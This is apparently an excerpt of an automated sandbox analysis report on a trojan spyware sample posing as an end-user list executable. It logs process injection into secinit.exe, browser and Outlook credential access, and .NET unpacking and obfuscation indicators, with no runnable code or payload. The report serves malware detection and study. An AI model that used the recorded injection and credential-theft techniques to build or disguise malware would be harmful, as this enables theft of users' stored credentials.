                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039ADAAC7_2_039ADAAC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039B1AA37_2_039B1AA3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039BDAC67_2_039BDAC6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CFA497_2_039CFA49
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039C7A467_2_039C7A46
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03983A6C7_2_03983A6C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039A59107_2_039A5910
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039199507_2_03919950
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0392B9507_2_0392B950
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039138E07_2_039138E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0397D8007_2_0397D800
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03911F927_2_03911F92
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CFFB17_2_039CFFB1
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_038D3FD57_2_038D3FD5
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_038D3FD27_2_038D3FD2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CFF097_2_039CFF09
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03919EB07_2_03919EB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0392FDC07_2_0392FDC0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039C1D5A7_2_039C1D5A
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03913D407_2_03913D40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039C7D737_2_039C7D73
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039CFCF27_2_039CFCF2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03989C327_2_03989C32
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03091E907_2_03091E90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0308AF607_2_0308AF60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0308CF707_2_0308CF70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0308CD477_2_0308CD47
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0308CD507_2_0308CD50
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0308B0AF7_2_0308B0AF
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0308B0B07_2_0308B0B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_0308B0F97_2_0308B0F9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_030937007_2_03093700
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_030936FB7_2_030936FB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_030955007_2_03095500
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_030ABB907_2_030ABB90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_037DE2C37_2_037DE2C3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_037DE1A47_2_037DE1A4
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_037DD7287_2_037DD728
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_037DE65C7_2_037DE65C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 03945130 appears 58 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 0397EA12 appears 86 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 03957E54 appears 107 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 0398F290 appears 103 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 038FB970 appears 262 times
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: String function: 012F7E54 appears 107 times
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: String function: 0131EA12 appears 86 times
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: String function: 0129B970 appears 262 times
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: String function: 012E5130 appears 58 times
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: String function: 0132F290 appears 103 times
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000000.1674952668.0000000000B36000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameslZm.exeN vs 022QCX_End_User_List_2025.exe
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1734955130.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 022QCX_End_User_List_2025.exe
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1740312572.0000000005ED0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs 022QCX_End_User_List_2025.exe
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1742793755.0000000007C40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 022QCX_End_User_List_2025.exe
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1737238959.00000000046C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 022QCX_End_User_List_2025.exe
                Source: 022QCX_End_User_List_2025.exe, 00000002.00000002.2062338945.0000000000E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesecinitj% vs 022QCX_End_User_List_2025.exe
                Source: 022QCX_End_User_List_2025.exe, 00000002.00000002.2064150805.000000000139D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 022QCX_End_User_List_2025.exe
                Source: 022QCX_End_User_List_2025.exeBinary or memory string: OriginalFilenameslZm.exeN vs 022QCX_End_User_List_2025.exe
                Source: 022QCX_End_User_List_2025.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 022QCX_End_User_List_2025.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, iVcVyeXi2nK6pmTWss.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, iVcVyeXi2nK6pmTWss.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, iVcVyeXi2nK6pmTWss.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, RkZkucFCmd7bABIx7J.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, RkZkucFCmd7bABIx7J.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, RkZkucFCmd7bABIx7J.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, RkZkucFCmd7bABIx7J.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, iVcVyeXi2nK6pmTWss.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, iVcVyeXi2nK6pmTWss.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, iVcVyeXi2nK6pmTWss.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, RkZkucFCmd7bABIx7J.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, RkZkucFCmd7bABIx7J.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, iVcVyeXi2nK6pmTWss.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, iVcVyeXi2nK6pmTWss.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, iVcVyeXi2nK6pmTWss.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@6/5
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\022QCX_End_User_List_2025.exe.logJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\secinit.exeFile created: C:\Users\user\AppData\Local\Temp\472E1186Jump to behavior
                Source: 022QCX_End_User_List_2025.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 022QCX_End_User_List_2025.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: secinit.exe, 00000007.00000002.2938814440.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000007.00000003.2252655145.00000000034C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 022QCX_End_User_List_2025.exeReversingLabs: Detection: 34%
                Source: 022QCX_End_User_List_2025.exeVirustotal: Detection: 27%
                Source: unknownProcess created: C:\Users\user\Desktop\022QCX_End_User_List_2025.exe "C:\Users\user\Desktop\022QCX_End_User_List_2025.exe"
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess created: C:\Users\user\Desktop\022QCX_End_User_List_2025.exe "C:\Users\user\Desktop\022QCX_End_User_List_2025.exe"
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"
                Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeProcess created: C:\Users\user\Desktop\022QCX_End_User_List_2025.exe "C:\Users\user\Desktop\022QCX_End_User_List_2025.exe"Jump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\gZJRpugesoYeKrsuoIXKLHeCTGfyMTDmIiIKcCRFgXloGdtRXAsTegkh\gJe493hPOgj2OnF5.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 022QCX_End_User_List_2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 022QCX_End_User_List_2025.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: 022QCX_End_User_List_2025.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: secinit.pdbGCTL source: 022QCX_End_User_List_2025.exe, 00000002.00000002.2062338945.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000006.00000002.2939070736.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: 022QCX_End_User_List_2025.exe, 00000002.00000002.2064150805.0000000001270000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000007.00000003.2067514851.0000000003722000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000007.00000002.2941206572.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000007.00000003.2058780129.000000000354B000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000007.00000002.2941206572.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 022QCX_End_User_List_2025.exe, 022QCX_End_User_List_2025.exe, 00000002.00000002.2064150805.0000000001270000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, secinit.exe, 00000007.00000003.2067514851.0000000003722000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000007.00000002.2941206572.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000007.00000003.2058780129.000000000354B000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000007.00000002.2941206572.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: secinit.pdb source: 022QCX_End_User_List_2025.exe, 00000002.00000002.2062338945.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, gJe493hPOgj2OnF5.exe, 00000006.00000002.2939070736.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: slZm.pdbSHA256 source: 022QCX_End_User_List_2025.exe
                Source: Binary string: slZm.pdb source: 022QCX_End_User_List_2025.exe
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gJe493hPOgj2OnF5.exe, 00000006.00000000.1980832555.00000000006EF000.00000002.00000001.01000000.0000000C.sdmp, gJe493hPOgj2OnF5.exe, 00000008.00000000.2137548095.00000000006EF000.00000002.00000001.01000000.0000000C.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.022QCX_End_User_List_2025.exe.5ed0000.4.raw.unpack, MainForm.cs.Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, iVcVyeXi2nK6pmTWss.cs.Net Code: dv16jT0lly System.Reflection.Assembly.Load(byte[])
                Source: 0.2.022QCX_End_User_List_2025.exe.498b168.3.raw.unpack, iVcVyeXi2nK6pmTWss.cs.Net Code: dv16jT0lly System.Reflection.Assembly.Load(byte[])
                Source: 0.2.022QCX_End_User_List_2025.exe.4900748.0.raw.unpack, iVcVyeXi2nK6pmTWss.cs.Net Code: dv16jT0lly System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0041F003 pushfd ; iretd 2_2_0041F01B
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00414086 push esi; ret 2_2_00414095
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00417939 push FFFFFFD7h; retf 2_2_0041793E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0040DA26 push es; iretd 2_2_0040DA2E
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00418AD8 pushad ; iretd 2_2_00418ADF
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0041940F push edx; ret 2_2_00419411
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00419416 push edi; retf 2_2_00419417
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_004075C0 push esi; retf 2_2_004075C8
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0040AD9E push ebp; retf 2_2_0040AD9F
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0040D5AD push 43AEBFE9h; ret 2_2_0040D5B9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00418654 push ds; ret 2_2_00418656
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00403660 push eax; ret 2_2_00403662
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00401669 push eax; retf 2_2_0040166A
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0040760B push ebx; iretd 2_2_0040760D
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00414EC6 push esp; ret 2_2_00414EC7
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_00401FEE pushad ; retf 2_2_00401FEF
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0127225F pushad ; ret 2_2_012727F9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012727FA pushad ; ret 2_2_012727F9
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012A09AD push ecx; mov dword ptr [esp], ecx2_2_012A09B6
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0127283D push eax; iretd 2_2_01272858
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_01271368 push eax; iretd 2_2_01271369
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_038D225F pushad ; ret 7_2_038D27F9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_038D27FA pushad ; ret 7_2_038D27F9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_039009AD push ecx; mov dword ptr [esp], ecx7_2_039009B6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_038D283D push eax; iretd 7_2_038D2858
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_030942D6 push FFFFFFD7h; retf 7_2_030942DB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03090A23 push esi; ret 7_2_03090A32
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03094FF1 push ds; ret 7_2_03094FF3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_030A13C2 push cs; ret 7_2_030A13D9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03091749 push esi; retf 7_2_03091771
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 7_2_03091750 push esi; retf 7_2_03091771
                Source: 022QCX_End_User_List_2025.exeStatic PE information: section name: .text entropy: 7.7486595742490465
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, UgOflU9VjnmdU4BJKo.csHigh entropy of concatenated method names: 'ASWSAVJnr1', 'KZoSR03PwW', 'aPTSGhkGEP', 'QmqGnpGfLj', 'J5rGzUmT5Q', 'eZxSg4PtQY', 'YakSeCTOri', 'pBxSyemIkt', 'hdfS00Y1t8', 'FMlS6YS3Rv'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, VWk99u2efuxaOdt9vw.csHigh entropy of concatenated method names: 'QMBHft6982', 'FAjHb6AjwQ', 'SCwHtqx5dE', 'OLPHVLgi4k', 'PvtHcq7txr', 'mSFHJpdHg8', 'eFcH9L4kL9', 'KtyHv0W8Oj', 'yTSHMAivS0', 'fKIHquNZpe'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, DSd2Dje6IG8YlqfMUyY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bgKaHk6XwL', 'tOtaYkR5IK', 'D0SaD0s4XT', 'KmVaah1Elh', 'SHea76EcsM', 'uoWaCpDgUZ', 'jriadjobXT'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, Oq1gkd4vypHy8EyW4y.csHigh entropy of concatenated method names: 'ToString', 'g2YZ1OYFhc', 'j2eZbOMF0m', 'CRFZtwT8uf', 'TSCZVO7EKO', 'UBBZcPIN21', 'uaPZJOF5m5', 'UVXZ9Z3tDS', 'MFRZvT2bm4', 'NdgZMPfwSa'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, DbXoYNzDXe27SDLB2w.csHigh entropy of concatenated method names: 'bpBYOqgOEq', 'U0DYFlOGEl', 'VwNYhi1tDx', 'mZCYfQbdIM', 'iBsYbthYuF', 'siLYVVvwnd', 'bmWYcVPSOl', 'rtnYdhoRde', 'MkrYmFs1Zl', 'NguYkAfaC3'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, JTplmleelqTJiq042GW.csHigh entropy of concatenated method names: 'uRTYnlPioJ', 'wleYzU6mMM', 'iAcDg7x7UN', 'IGtDeZ0PnK', 'qPWDyZDGD2', 'sYRD0r5bXp', 's43D63ieOb', 'DrHDEpR0Qk', 'NfKDApTRn1', 'zDlDipPxMv'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, vmUj6Ch9ChYZuci2v4.csHigh entropy of concatenated method names: 'yEnR5O0T2y', 'RrRRONahY5', 'CeBRFMorfm', 'zdwRhe4sxI', 'CuvRKHtQLV', 'BIORZYEMvq', 'wqMRuk4ZoG', 'cwpRrOQNhs', 'wE1RHKey1I', 'o1ORYDJBhP'
                Source: 0.2.022QCX_End_User_List_2025.exe.7c40000.5.raw.unpack, jc2588Mtb2pU3F57by.csHigh entropy of concatenated method names: 'SodSmGWD6I', 'g29SkmkMIZ', 'rPcSjaDg67', 'MSTS5HZfgn', 'BJySIGWOpr', 'PaGSO9hAkH', 'ABTSN9Zxmk', 'P0BSFIvLUX', 'rQ2ShuWrjn', 'oilSPq2I6I'
